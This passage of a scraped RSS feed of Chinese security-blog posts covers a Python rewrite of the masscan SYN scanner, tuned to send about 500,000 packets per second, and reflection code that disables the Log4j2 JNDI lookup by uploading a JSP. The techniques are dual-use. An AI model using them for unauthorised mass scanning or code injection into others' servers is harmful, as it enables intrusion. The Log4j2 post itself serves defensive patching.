data-w="1756" src="https://wechat2rss.xlab.app/img-proxy/?k=10d4b1f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBhMNa4F6QJKawu1ULqVTfw7ibV20unflKpctBkOJYzN85cFEWaRZtnPA%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">image.png</figcaption></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;"><span style="display: none;"></span><span>接收</span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">调用<strong>pcap_next_ex</strong>即可收报。在masscan中使用<strong>pcap_next</strong>收报。但是该函数存在很多问题，例如收报不及时等。官方推荐**pcap_next_ex函数。**这块我们顺手改成这个函数即可。注意，开启抓包模式的情况下，可能也会捕获系统tcp/ip的报文。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">既然我们一个线程发送，一个线程接收。如何从响应包中确定开放端口呢？回到tcp syn中，发送一个seq为x的syn包。对方响应ack+syn，ack序号为syn包的x+1。那么我们将目标ip，目标端口，我们的ip，我们的端口做一个简单的hash，结果设为syn包的seq。这样我们只需要对接收到的报文同样做hash运算，即可确定是我们发送的扫描包的响应。如图<img class="rich_pages wxw-img" data-ratio="0.5300950369588173" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1894" src="https://wechat2rss.xlab.app/img-proxy/?k=6b1f60bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBeic4fzFNOffkFFwibEUxqM7JDrlKnrcCg0dicPBibWvhariboET6dKdNxGA%2F640%3Fwx_fmt%3Dpng"/>为了防止重复多个报文，我们使用bloom过滤器。相对于hashmap，bloom过滤器可以很好的应对小内存与大数据量的去冲。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">注意，在解析ip报文的时候一定要考虑options选项！<img class="rich_pages wxw-img" data-ratio="0.970679012345679" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1296" src="https://wechat2rss.xlab.app/img-proxy/?k=4757a737&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBHlZDuMia9GN9vB7Z3YG7A4P6mb9sicXbibVvW0eEfO33xKrzT2IftuHQA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.80440097799511" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1636" src="https://wechat2rss.xlab.app/img-proxy/?k=d1854e43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBLiaiaM9KGhIQgibCaiajSK4NSfVJUE0ujzobqKId2t0Af1iaz0mMlMn4Qcw%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">image.png</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>控制发包速度</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在万事俱备直接发包就行。但是我们要控制发送速度，太快或者太慢都不好。在这里我们移植masscan的代码，名为Throttler，也就是化油器。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在ip层是尽力而为，也就是说我们发包速度太快，路由器很有可能并不会转发，直接丢弃。这也就是我们为什么需要控制发包速度的原因。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在最之前有icmp 源抑制报文，<strong>源站抑制报文</strong>旨在请求发送方降低发往路由器或主机的报文发送速率。在接收的过程中，当接收方没有足够的接收缓冲区来处理接收到的报文，或者接收这个报文会导致临近其本身的缓冲区限制时，就会触发源站抑制报文。数据被从一个或一群主机高速地发往网络上的一个路由器，虽然路由器有缓冲机制，但是路由器的缓冲区大小通常（由于物理内存有限的原因）被限制。因此，如果路由器的通信量过大，路由器最终会（由于内存耗尽，导致必须丢弃掉接收到的数据报）无法继续处理超过输入缓冲区限制的部分数据，直到路由器缓冲队列有空余空间可以存放新的数据报。但是由于网络层（Network Layer）缺乏确认消息（ACK）机制，因此客户端无法获知数据是否成功抵达接收方。所以研究者提出了源站抑制这一补救措施来解决这一问题：当路由器发现流入数据速率远远高于流出数据速率时，会发送ICMP源站抑制报文给源站，通知源站应该降低其数据传输速度或等待一定时间后再尝试发送更多数据。当源站接收到ICMP源站抑制报文时会减慢数据发送的速度，或者在再次尝试发送数据前等待一定的时间，使得路由器能够（在处理完当前接收到的数据之后）清空输入缓冲队列。但是因为有研究表明“源站抑制是一种无效的（不公平的）补救措施“，所以路由的源站抑制报文已在1995年被RFC 1812弃用。此外，（路由）转发和回应任何形式的源站抑制报文已在2012年被RFC 6633 弃用。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">核心思想是使用令牌桶的原理，学过QOS流量的网工大佬都知道令牌桶限速算法。每秒钟给多少个令牌，然后发送即可<img class="rich_pages wxw-img" data-ratio="0.8076923076923077" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1560" src="https://wechat2rss.xlab.app/img-proxy/?k=729fd56f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBneLbXg85Cf9542BNaicpiazpro6xb9HeAQMWqxNrcM0peTa1rp4N4uaQ%2F640%3Fwx_fmt%3Dpng"/></p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>重写</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">为什么选择重写？降低开发难度，解决bug，添加指纹识别功能。masscan的基础功能在很多种场景不适合我们。我们团队中懂c开发的同学非常少，所以我们只能选择使用python重写。万幸的是masscan的代码质量很高，重写起来效率非常高。使用python编写例如目标输入，结果输出，等非核心代码。pcap发包函数等，直接将masscan的代码移植到python中即可。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>c与python传递指针</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在masscan中存在大量的指针操作。我们如何将c指针传递到python，在c语言中获取python传递的指针。在python中使用Capsule对象即可包装一个指针成为c对象，用法十分简单，示例代码</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD2F5ibdw5KgGPd6DOYIL3bvMTVYeia4YATjXYF3cHlMxuDW5OVxR3iaOoWf3DgXiaWK00e6xSressib3k/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #5c6370;font-style: italic;line-height: 26px;">/* Destructor function for points */</span><br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">static</span> <span style="color: #c678dd;line-height: 26px;">void</span> <span style="color: #61aeee;line-height: 26px;">del_Point</span><span style="line-height: 26px;">(PyObject *obj)</span> </span>{<br/>  <span style="color: #e6c07b;line-height: 26px;">free</span>(PyCapsule_GetPointer(obj,<span style="color: #98c379;line-height: 26px;">&#34;Point&#34;</span>));<br/>}<br/> <br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">static</span> PyObject *<span style="color: #61aeee;line-height: 26px;">PyPoint_FromPoint</span><span style="line-height: 26px;">(Point *p, <span style="color: #c678dd;line-height: 26px;">int</span> must_free)</span> </span>{<br/>  <span style="color: #5c6370;font-style: italic;line-height: 26px;">/* 胶囊和C指针类似。在内部，它们获取一个通用指针和一个名称，可以使用<br/>  PyCapsule_New() 函数很容易的被创建。 另外，一个可选的析构函数能被<br/>绑定到胶囊上，用来在胶囊对象被垃圾回收时释放底层的内存*/</span><br/>  <span style="color: #c678dd;line-height: 26px;">return</span> PyCapsule_New(p, <span style="color: #98c379;line-height: 26px;">&#34;Point&#34;</span>, must_free ? del_Point : <span style="color: #56b6c2;line-height: 26px;">NULL</span>);<br/>}<br/><span style="color: #5c6370;font-style: italic;line-height: 26px;">/* Utility functions */</span><br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">static</span> Point *<span style="color: #61aeee;line-height: 26px;">PyPoint_AsPoint</span><span style="line-height: 26px;">(PyObject *obj)</span> </span>{<br/>  <span style="color: #c678dd;line-height: 26px;">return</span> (Point *) PyCapsule_GetPointer(obj, <span style="color: #98c379;line-height: 26px;">&#34;Point&#34;</span>);<br/>}<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><br/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>计数引用</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">由于我们的代码在c中，例如生成的对象引用等，python虚拟机根本就管不到。很有可能造成内存溢出的难题。所以我们一定要对计数引用了如指掌。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>什么时候不需要调用INCREF</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1.对于函数中的局部变量，这些局部变量如果是PyObject对象的指针，没有必要增加这些局部对象的引用计数。理论上，当有一个变量指向对象的时候，对象的引用计数会被+1，同时在变量离开作用域时，对象的引用计数会被-1，而这两个操作是相互抵消的，最终对象的引用数没有改变。使用引用计数真正的原因是防止对象在有变量指向它的时候被提前销毁。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>什么时候需要调用INCREF</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">如果有任何的可能在某个对象上调用DECREF，那么就需要保证该对象不能处于unprotected状态。1） 如果一个引用处于unprotected，可能会引起微妙的bug。一个常见的情况是，从list中取出元素对象，继续操作它，但是不增加它的引用计数。PyList_GetItem 会返回一个 borrowed reference ，所以 item 处于未保护状态。一些其他的操作可能会从 list 中将这个对象删除（递减它的引用计数，或者释放它）。导致 item 成为一个悬垂指针。2） 传递PyObject对象给函数，一般都是假设传递过来的对象的引用计数已经是protected，因此在函数内部不需要调用Py_INCREF。不过，如果想要参数存活到函数退出，可以调用Py_INCREF。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>编译产物</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里使用python build就可以完成。但是我是用cmake编译，脚本如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD2F5ibdw5KgGPd6DOYIL3bvMTVYeia4YATjXYF3cHlMxuDW5OVxR3iaOoWf3DgXiaWK00e6xSressib3k/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">include_directories(/opt/homebrew/opt/python@3.9/Frameworks/Python.framework/Headers)<br/>add_link_options( -undefined dynamic_lookup  -Wl,-headerpad,0x1000)<br/>message(${PROJECT_NAME})<br/>add_library(pyh SHARED  ${superscan})<br/>set_target_properties(pyh PROPERTIES SUFFIX <span style="color: #98c379;line-height: 26px;">&#34;so&#34;</span>)<br/>set_target_properties(pyh PROPERTIES PREFIX <span style="color: #98c379;line-height: 26px;">&#34;&#34;</span>)<br/>set_target_properties(pyh PROPERTIES OUTPUT_NAME <span style="color: #98c379;line-height: 26px;">&#34;SuperScan_C.cpython-39-darwin.&#34;</span>)<br/></code></pre><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>调用</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们需要写一份接口文件，方便类型推断。<img class="rich_pages wxw-img" data-ratio="0.6834862385321101" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1744" src="https://wechat2rss.xlab.app/img-proxy/?k=9887fd75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBUkLCibKQrlwEG6lg2mVibVItaTOqqibHiaJ12oLBwd1GVt7yOO7AZWWdIA%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>存储扫描结果</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们可以预先生成扫描结果，将其存储在磁盘中，在读取的时候利用生成器的思想读取即可。</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>测试</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">代码截图
发送函数<img class="rich_pages wxw-img" data-ratio="0.49938195302843014" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1618" src="https://wechat2rss.xlab.app/img-proxy/?k=51392e36&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWB81UnpInOjnbsFVHBTnG9EDtTnK5VQOm9nq9LVn7KuTG3RJw6pSBaAQ%2F640%3Fwx_fmt%3Dpng"/>抓包函数<img class="rich_pages wxw-img" data-ratio="0.6070336391437309" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1308" src="https://wechat2rss.xlab.app/img-proxy/?k=cef193b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBPSFzmX1M7LyTTJicOfPDsRXVzt27Bib2ho4t5FQ35eCUKbUy2xHPwLgw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">由于python GIL锁的问题，我们最终达到每秒发送50万 tcp syn包的成绩。网卡每秒发送80-100MB的流量。扫描千万级别IP的端口开放仅需半小时。<img class="rich_pages wxw-img" data-ratio="0.1317365269461078" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1002" src="https://wechat2rss.xlab.app/img-proxy/?k=ab9d0181&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBEibaCfBYQyLVrA2fTnXzIaQvQT4UYcvibKUXPzibPmGtnBu93iaMic0rROg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">内存占用15MB左右。相对比使用命令行启动masscan，大大提升了性能。并且开发简单～</p></section><p><br/></p>



<p><a href="2247485625">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a17ed805&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485625%26idx%3D1%26sn%3D64bc8ff10aeb7c462480b139cec747f7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 31 Jan 2022 15:35:00 +0800</pubDate>
    </item>
    <item>
      <title>探讨如何利用反射修复Log4j2的方法</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485595&amp;idx=1&amp;sn=f7e5cde138fffe6e6ef0e9fa054a22f4</link>
      <description>反射修复log4j2</description>
      <content:encoded><![CDATA[<p>
原创 <span>zy</span> <span>2021-12-11 21:31</span> <span style="display: inline-block;"></span>
</p>

<p>反射修复log4j2</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=186c3a9c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9WDianB77hH18q4cARMzEhiasgIdwtKtMYeO7tGBqcPEpKAibOfxttU2iaQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最近一天被log4j2刷屏了，多说一句，这个漏洞其实非常考验安全人员的应急能力，代码能力和社交能力。漏洞都三天了，竟然还有人在要exp，现在做安全的人都这么水了吗？</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们向开发者给出安全建议的时候，一定要结合业务方具体需求，不要给出不切合实际的修复方案。即不能宕机，又要保证安全性。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">还有很多写规则的乙方waf同学，漏洞自己都没研究明白，就要写规则，结果误报一大堆。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>修复方法1，升级</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这种方案是最简单的，但是需要关闭应用，重新打包，提测。但是这种修复方案是最彻底的。当然，如果因为某些原因不方便关闭应用，那么下面几种方法可能最适合业务方。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>修复方法2，修改配置文件</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这个修复方法也需要暂时关闭应用，配置方法 log4j2.formatMsgNoLookups=True。当然，既然选择这种修复方案，那还不如选择第一种修复方案比较彻底。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>修复方法3，javaagent</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这个方法，需要给JDK注入一个jar，在jar中将存在漏洞的class代码直接修改。缺点？有可能业务方不愿意用你的rasp。毕竟拖拖拉拉，万一影响业务性能巴拉巴拉怎么整？</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">但是优点不需要关闭站点，不会影响线上业务。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">参考长亭 <a href="https://github.com/chaitin/log4j2-vaccine" target="_blank">https://github.com/chaitin/log4j2-vaccine</a></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>修复方法4，反射修改属性</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这种方法同样也不需要重启应用，只需要可以在对方的JVM中执行代码，就可以修复。无任何风险。当然前提一定是可以执行代码，方式包括jsp文件等。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这东西其实就是内存马的核心思想，包括DFS搜索对象等等～</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.47" data-s="300,640" style="" data-type="png" data-w="1500" src="https://wechat2rss.xlab.app/img-proxy/?k=8f889076&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx92x1U6t5VUrmh0TBWJrfCLZSb2ap8fEER0WBAYcWJTjmGrjEbYrLXfQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.528158295281583" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1314" src="https://wechat2rss.xlab.app/img-proxy/?k=89854940&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9Xj6VoQnT54RhvwTRia4cZgjpSibyc5oSibWwTZm954azjoicr8f2Ck4Zsg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">既然我们已经知道了，最终根据前缀来找到最终的处理程序，也就是lookup。那么我们通过反射，直接修改strLookUPMap不就可以。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在log4j2中，配置文件是用单例模式，所以非常容易修改。。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过反射修改这个对象，首先我们要拿到这个对象的引用。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用我这段通过DFS搜索对象的工具。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.06497797356828194" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1816" src="https://wechat2rss.xlab.app/img-proxy/?k=3dc24c6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9aZ4eVrkI2GJOFqb17mCzoC8ugaF4GAjK78V38qgxE5GbE8ic9Sk2qSw%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.2821637426900585" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="2736" src="https://wechat2rss.xlab.app/img-proxy/?k=0bad45f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9el0xCyKr70jziauxNGLD0ocTutibaRPGq2v8uP2qy0EyPprekxWplibdg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.10680321872713973" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="2734" src="https://wechat2rss.xlab.app/img-proxy/?k=ee5d910f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9y5HmGfXfQicr4bNoR0r1V2jL7187RuXWbzDzxyrv0nmHCYlHcTQrblg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">选择一个我们喜欢的对象查找路径，然后将其变成反射代码就可以了。代码大概如图<img class="rich_pages wxw-img" data-ratio="0.4230769230769231" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1820" src="https://wechat2rss.xlab.app/img-proxy/?k=fa434f38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9nQlJ9YtyQrJ7bI2mkzAw4J8xHw4pIa7IL5nLcRty4BIpCvdemVkdYQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-ratio="0.081267217630854" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1452" src="https://wechat2rss.xlab.app/img-proxy/?k=6dccaa26&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGr1HESrgQZN7iaKnpwpsx9PwkkXMfyF14YP83ahHwTxN6gIxjmice0ZgB9O6v0zloGNlKOIJ99T6Q%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">把这段代码包装成jsp文件，直接上传到web站点运行就行。当然如果是springboot的话，想办法执行代码也是可以的。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最终成功的没有触发jndi请求。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">代码</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;"><code style="display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;border-radius: 0px;font-size: 12px;-webkit-overflow-scrolling: touch;">    Object obj = LogManager.getLogger();<br/>    Field contextF = obj.getClass().getDeclaredField(&#34;context&#34;);<br/>    contextF.setAccessible(true);<br/>    Object context = contextF.get(obj);<br/>    Field configurationF = context.getClass().getDeclaredField(&#34;configuration&#34;);<br/>    configurationF.setAccessible(true);<br/>    Object configuration = configurationF.get(context);<br/>    Field substF = configuration.getClass().getSuperclass().getDeclaredField(&#34;subst&#34;);<br/>    substF.setAccessible(true);<br/>    Object subst = substF.get(configuration);<br/>    Field variableResolverF = subst.getClass().getDeclaredField(&#34;variableResolver&#34;);<br/>    variableResolverF.setAccessible(true);<br/>    Object variableResolver = variableResolverF.get(subst);<br/>    Field strLookupMapF = variableResolver.getClass().getDeclaredField(&#34;strLookupMap&#34;);<br/>    strLookupMapF.setAccessible(true);<br/>    HashMap strLookupMap = (HashMap) strLookupMapF.get(variableResolver);<br/>    strLookupMap.remove(&#34;jndi&#34;);<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">以上几种方法仅供参考</p></section><p><br/></p>



<p><a href="2247485595">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2f3bd89b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485595%26idx%3D1%26sn%3Df7e5cde138fffe6e6ef0e9fa054a22f4%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 11 Dec 2021 21:31:00 +0800</pubDate>
    </item>
    <item>
      <title>Log4j2 研究之lookup</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485584&amp;idx=1&amp;sn=2fad11942986807ea7545f7b8b5d6af8</link>
      <description>一個稱得上優秀的框架，必備的要素之一可以通過某種約定的格式讀取到所運行環境中的配置信息。本文中我們就來感受下</description>
      <content:encoded><![CDATA[<p>
原创 <span>zy</span> <span>2021-12-09 23:50</span> <span style="display: inline-block;"></span>
</p>

<p>一個稱得上優秀的框架，必備的要素之一可以通過某種約定的格式讀取到所運行環境中的配置信息。本文中我們就來感受下</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=2884379d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjNwoSbDWNeTlCib6Ft9LOySibme7VsvyGJIGiapYNhZtLOtaanRuJrSVrg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


